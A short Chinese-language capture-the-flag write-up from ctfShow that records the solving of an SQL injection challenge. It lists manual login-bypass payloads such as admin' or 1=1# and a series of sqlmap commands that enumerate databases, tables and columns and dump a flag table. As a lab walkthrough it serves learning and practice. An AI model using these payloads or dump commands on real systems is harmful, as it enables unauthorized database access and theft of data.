ctfShow sql注入笔记

遇到了sql注入的题目，记录一下sqlmap使用过程

一、手工注入测试

1、简单的万能注入先测试一下

用户名：admin') or 1=1# /  admin' and 1=1 # /   admin' or 1=1 # /  admin' and -1=-1 ....

密码：123'

结果没测出来，也没报错,一点反应都没有

二、sqlmap工具扫描

先用sqlmap跑一下，找出注入点

1、将请求包写入1.txt，然后执行sqlmap -r 1.txt --batch

存在时间注入和联合注入，可以利用一下联合注入，但是目前不知道有哪些库和表，先查一下

2、sqlmap -r 1.txt -dbs --batch，ctftraining这个库看着比较像存着flag的数据库，先查看一下

3、sqlmap -r 1.txt -D ctftraining --tables  --batch ，FLAG_TABLE这个表比较像，还是跟着感觉走，查看一下这个表

4、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE --columns  --batch 

 5、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE -C "FLAG_COLUMN" --dump  --batch ，空的，感觉错了，从数据库从头再查

6、重复步骤省略，最后在web2数据库下的flag表中发现flag字段，并且成功找到flag

 就很坑，，，，，